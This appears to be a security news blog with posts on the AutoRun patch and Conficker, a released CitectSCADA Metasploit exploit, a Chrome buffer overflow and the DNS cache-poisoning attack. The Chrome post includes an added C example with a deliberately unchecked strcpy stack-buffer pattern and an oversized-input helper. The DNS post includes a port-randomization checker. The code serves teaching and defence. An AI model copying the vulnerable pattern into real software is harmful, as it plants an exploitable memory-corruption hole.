So what happened to the equivalent patch for Windows 2000, XP, and Server 2003? In May 2008, Microsoft had in fact released a patch for these systems, which is described in Knowledge Base article 953252. However, as described in a Jan. 22, 2009, Computerworld article, US-CERT found that the fix for XP/2000/2003 had to be applied manually. Furthermore, Microsoft was not making the patch available automatically via any Windows Update service.

It wasn't until Feb. 24 of this year that Microsoft distributed this patch via Windows Update to XP, 2000, and 2003. This is described in the company's security advisory 967940.

Many home and business PC users rarely deploy patches that aren't available through Windows Update, Microsoft Update, or WSUS (Windows Server Update Services). Add to this the confusing and conflicting information about the AutoRun patch, and it's no wonder the Conficker worm, which exploits AutoRun functionality, made the inroads that it did.

You may be wondering why it took Microsoft so long to distribute for XP/2000/2003 users the fix that permits AutoRun to be properly disabled. One clue may be found in the file versions listed in KB article 967715. The Windows Server 2003 files are dated Feb. 10, 2009. Typically, Microsoft doesn't release a fix for one platform if it's still developing a fix for another platform. This is done to avoid putting one set of customers at risk while protecting others.

That's usually a valid reason to wait before distributing patches. But when you open up the files described in the earlier KB article 953252, you find that all the files in that hotfix date back to mid-2008.

Why did it take an admonition from CERT to convince Microsoft to add this vital fix to Automatic Updates for those versions of Windows? To make things even more confusing, the way Microsoft released the XP/2000/2003 fix at the end of February caused many people to think it was an out-of-cycle security patch.

For home users, I'm not yet ready to pull the fire alarm and tell everyone to disable AutoRun. But I do urge you to be very leery of plugging USB flash drives into your system if you're unsure whether they've been used on other computers. Large organizations, however, should consider disabling AutoRun on their networked PCs, considering how hard it's been to stomp out the Conficker worm and others.

So do you think if this patch had been pushed to all Windows users sooner, much of Conficker's pain might have been avoided?

Friday, September 12, 2008

SCADA Attack code released

Threat to computers for industrial systems now serious

A security researcher has published code that could be used to take control of computers used to manage industrial machinery, potentially giving hackers a back door into utility companies, water plants, and even oil and gas refineries.

The software was published late Friday night by Kevin Finisterre, a researcher who said he wants to raise awareness of the vulnerabilities in these systems, problems that he said are often downplayed by software vendors. "These vendors are not being held responsible for the software that they're producing," said Finisterre, who is head of research with security testing firm Netragard. "They're telling their customers that there is no problem, meanwhile this software is running critical infrastructure."

Finisterre released his attack code as a software module for Metasploit, a widely used hacking tool. By integrating it with Metasploit, Finisterre has made his code much easier to use, security experts said. "Integrating the exploit with Metasploit gives a broad spectrum of people access to the attack," said Seth Bromberger, manager of information security at PG&E. "Now all it takes is downloading Metasploit and you can launch the attack."

The code exploits a flaw in Citect's CitectSCADA software that was originally discovered by Core Security Technologies and made public in June. Citect released a patch for the bug when it was first disclosed, and the software vendor has said that the issue poses a risk only to companies that connect their systems directly to the Internet without firewall protection, something that would never be done intentionally. A victim would also have to enable a particular database feature within the CitectSCADA product for the attack to work.

These types of industrial SCADA (supervisory control and data acquisition) process control products have traditionally been hard to obtain and analyze, making it difficult for hackers to probe them for security bugs, but in recent years more and more SCADA systems have been built on top of well-known operating systems like Windows or Linux making them both cheaper and easier to hack.

IT security experts are used to patching systems quickly and often, but industrial computer systems are not like PCs. Because downtime at a water plant or power system can lead to catastrophe, engineers can be reluctant to make software changes or even to bring the computers off-line for patching.

This difference has led to disagreements between IT professionals like Finisterre, who see security vulnerabilities being downplayed, and industry engineers charged with keeping these systems running. "We're having a little bit of a culture clash going on right now between the process control engineers and the IT folks," said Bob Radvanovsky, an independent researcher who runs a SCADA security online discussion list that has seen some heated discussions on this topic.

Citect said that it had not heard of any customers who had been hacked because of this flaw. In a statement (PDF) released Tuesday, the company said it plans to soon release a new version of CitectSCADA with new security features.

That release will come none too soon, as Finisterre believes that there are other, similar, coding mistakes in the CitectSCADA software.

And while SCADA systems may be separated from other computer networks within plants, they can still be breached. For example, in early 2003, a contractor reportedly infected the Davis-Besse nuclear power plant with the SQL Slammer worm.

"A lot of the people who run these systems feel that they're not bound by the same rules as traditional IT," Finisterre said. "Their industry is not very familiar with hacking and hackers in general."

Tuesday, September 9, 2008

Google issues first patches for Chrome

They're aimed at multiple security vulnerabilities; browser updates automatically

Just days after it rolled out Chrome, Google Inc. issued an update after Vietnamese security researchers reported a critical vulnerability in the beta browser.

According to Le Duc Anh, a researcher at Bach Khoa Internetwork Security (BKIS), which is housed at the Hanoi University of Technology, the Chrome beta posted last week contained a buffer overflow bug that could be used by attackers to hijack PCs.

The flaw can be triggered when the user saves a Web page -- using Chrome's "Save page as" command -- with a very long name. That, in turn, creates a stack-based buffer overflow that hackers can leverage to introduce additional malicious code.

"To exploit the vulnerability, a hacker might construct a specially-crafted Web page, which contains malicious code," said a security advisory issued by BKIS on Friday. "[The hacker would] then trick users into visiting his site and convince them to save this page. Right after that, the code would be executed, giving him the privilege to make use of the affected system."
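The bug class described above, shown as an added example rather than Chrome's own code: a page title copied into a fixed-size stack buffer with no length check, next to a hardened version that checks the length before writing and rejects a title that cannot fit. The buffer size, the `.html` suffix and the function names are assumptions chosen for the illustration; the 300-byte title is constructed input standing in for the "very long name" the advisory describes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of the on-stack name buffer in the vulnerable pattern (assumed). */
#define NAME_MAX_LEN 64

/*
 * VULNERABLE pattern, for illustration only (not Chrome's code): the page
 * title is copied into a fixed-size stack buffer with no length check, so a
 * title longer than NAME_MAX_LEN - 1 bytes runs past the buffer into whatever
 * the compiler placed above it, typically the saved frame pointer and the
 * return address. Only ever call this with a short title; a long one is the bug.
 */
void build_save_name_vulnerable(char *out, const char *title)
{
    char name[NAME_MAX_LEN];
    strcpy(name, title);        /* unbounded copy: the overflow happens here */
    strcat(name, ".html");      /* and can continue here */
    strcpy(out, name);
}

/*
 * Hardened form: the caller passes the destination and its size, the length
 * is checked before anything is written, and a title that cannot fit
 * (together with ".html" and the terminating NUL) is rejected, not truncated.
 * Returns 0 on success, -1 if the title is too long.
 */
int build_save_name_safe(char *out, size_t outsz, const char *title)
{
    static const char suffix[] = ".html";
    size_t tl = strlen(title);
    size_t sl = sizeof suffix - 1;

    if (tl > SIZE_MAX - sl - 1 || tl + sl + 1 > outsz)
        return -1;
    memcpy(out, title, tl);
    memcpy(out + tl, suffix, sl + 1);   /* copies the terminating NUL too */
    return 0;
}

/* Wrapper around the safe version using a buffer of the same size the
 * vulnerable version used; returns NULL when the title is rejected. */
const char *safe_save_name(const char *title)
{
    static char name[NAME_MAX_LEN];
    return build_save_name_safe(name, sizeof name, title) == 0 ? name : NULL;
}

/* Constructed input: a title of n 'A' bytes, the "very long name" of the
 * advisory. Returns a static buffer; n is capped at 1023. */
const char *long_title(size_t n)
{
    static char buf[1024];
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    char out[NAME_MAX_LEN + 8];

    build_save_name_vulnerable(out, "index");   /* short title: works by luck */
    printf("vulnerable, short title: %s\n", out);

    /* build_save_name_vulnerable(out, long_title(300)) would smash the stack;
     * the safe version refuses the same input instead. */
    printf("safe, short title: %s\n", safe_save_name("index"));
    printf("safe, 300-byte title: %s\n",
           safe_save_name(long_title(300)) ? "accepted" : "rejected");
    return 0;
}
```

The hardened version deliberately fails closed: silently truncating the name would avoid the overflow but could still produce a surprising file name, so it is better to return an error and let the caller decide.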

Chrome 0.2.149.27 is affected by the vulnerability. BKIS maintained that, of several Chrome bugs reported last week, this is the only one that could be used to compromise a computer.

Google patched the vulnerability Sunday and released an updated beta, Version 0.2.149.29, the same day. "We've released an update to Google Chrome that fixes many of the issues reported here," said someone identified only as "Simon" in a Chrome support forum yesterday.

Refer here for another flaw in Google Chrome on Roger's Blog.

Friday, July 25, 2008

DNS Attack Code Exploit

Metasploit Loads Up DNS Attack Code

Script kiddies and sophisticated hackers gained easy access to code for exploiting a critical flaw in the domain name service (DNS) system when the Metasploit Project added two attacks to its toolkit.

Back on July 9th, an advisory to major vendors of DNS systems advised them to patch their products with all due haste. Security pros with unpatched DNS systems under their purview reading this today need to get this done fast.

The Metasploit Project updated its framework to include code aimed at testing DNS for vulnerability to exploitation. A successful attack using the method discovered by Dan Kaminsky and confirmed by Halvar Flake lets an attacker poison a recursive nameserver's cache, so that clients relying on that server are silently directed to a site of the attacker's choosing.
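A check an administrator can run before worrying about stragglers, added here as example code (not part of the original post, Metasploit or any resolver): the coordinated patches for this flaw added randomization of the UDP source port of outbound queries, so that a forger has to guess the port as well as the 16-bit transaction ID. The program below takes a sample of source ports read off the wire from a resolver's outbound queries and classifies the resolver as fixed-port, sequential-port or randomized, then shows how much each behaviour shrinks or grows the guess space. The three port samples are constructed, not captured; the classification thresholds and the 1024..65535 ephemeral port range are assumptions for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SAMPLE_N 16

/* Constructed samples (not real captures): UDP source ports of 16 consecutive
 * outbound queries, one sample per resolver behaviour. */
static const uint16_t fixed_ports[SAMPLE_N] = {
    32768, 32768, 32768, 32768, 32768, 32768, 32768, 32768,
    32768, 32768, 32768, 32768, 32768, 32768, 32768, 32768 };
static const uint16_t sequential_ports[SAMPLE_N] = {
    1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032,
    1033, 1034, 1035, 1036, 1037, 1038, 1039, 1040 };
static const uint16_t random_ports[SAMPLE_N] = {
    40121, 58377, 12902, 61055, 33490,  9111, 52738, 27465,
    44012, 60298, 18743, 55020,  3902, 49678, 31255, 57019 };

enum port_behaviour { PORT_FIXED = 0, PORT_SEQUENTIAL = 1, PORT_RANDOM = 2 };

/* Number of distinct 16-bit values in v[0..n), counted with a 64 Kbit bitmap. */
size_t count_distinct(const uint16_t *v, size_t n)
{
    uint8_t seen[8192];
    size_t i, d = 0;
    memset(seen, 0, sizeof seen);
    for (i = 0; i < n; i++) {
        unsigned idx = v[i] >> 3, bit = 1u << (v[i] & 7);
        if (!(seen[idx] & bit)) { seen[idx] |= bit; d++; }
    }
    return d;
}

/* Classify a sample of source ports. Thresholds are rules of thumb chosen for
 * this example: at most half the queries on distinct ports -> fixed; at least
 * half of the consecutive queries differing by exactly +1 -> sequential
 * (predictable); otherwise treated as randomized. */
enum port_behaviour classify_ports(const uint16_t *ports, size_t n)
{
    size_t i, steps = 0;
    if (n < 2 || count_distinct(ports, n) * 2 <= n)
        return PORT_FIXED;
    for (i = 1; i < n; i++)
        if ((uint16_t)(ports[i] - ports[i - 1]) == 1)
            steps++;
    if (steps * 2 >= n - 1)
        return PORT_SEQUENTIAL;
    return PORT_RANDOM;
}

/* Values an attacker must guess per forged reply: the 16-bit transaction ID
 * alone when the port is fixed or predictable, or the ID times the ephemeral
 * port range when it is randomized. 64512 = ports 1024..65535 (assumed range;
 * operating systems differ). */
double guess_space(enum port_behaviour b)
{
    const double txids = 65536.0, ports = 64512.0;
    return b == PORT_RANDOM ? txids * ports : txids;
}

/* Probability that k forged replies with distinct guesses include the right
 * (ID, port) pair before the genuine answer arrives. */
double spoof_probability(double k, enum port_behaviour b)
{
    double s = guess_space(b);
    return k >= s ? 1.0 : k / s;
}

int main(void)
{
    const char *names[] = { "fixed", "sequential", "randomized" };
    const uint16_t *samples[] = { fixed_ports, sequential_ports, random_ports };
    int i;
    for (i = 0; i < 3; i++) {
        enum port_behaviour b = classify_ports(samples[i], SAMPLE_N);
        printf("%-10s: %2zu distinct ports, verdict=%-10s, "
               "P(success | 65536 forged replies)=%.2e\n",
               names[i], count_distinct(samples[i], SAMPLE_N), names[b],
               spoof_probability(65536.0, b));
    }
    return 0;
}
```

A resolver classified as fixed or sequential is exactly the case the flood in Metasploit is aimed at: 65536 forged replies cover the whole ID space, whereas against a randomized port the same flood has a success chance of roughly one in 64,000 per query. Real captures should be a few hundred queries long, and a NAT in front of the resolver can rewrite the ports and undo the randomization, so sample from the outside of the NAT as well.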

Threat Level learned from Metasploit maintainer and noteworthy security researcher HD Moore about the updates to the testing tool with this code. The two exploits make it "much more effective for wide-scale hijacking," according to Moore.

Much of the threat may have been mitigated already, due to work by Kaminsky and Paul Vixie in coordinating a global response with major vendors of affected products. It won't mean much if admins of vulnerable systems do not apply the patches; one hopes any stragglers will perk up today and get this done.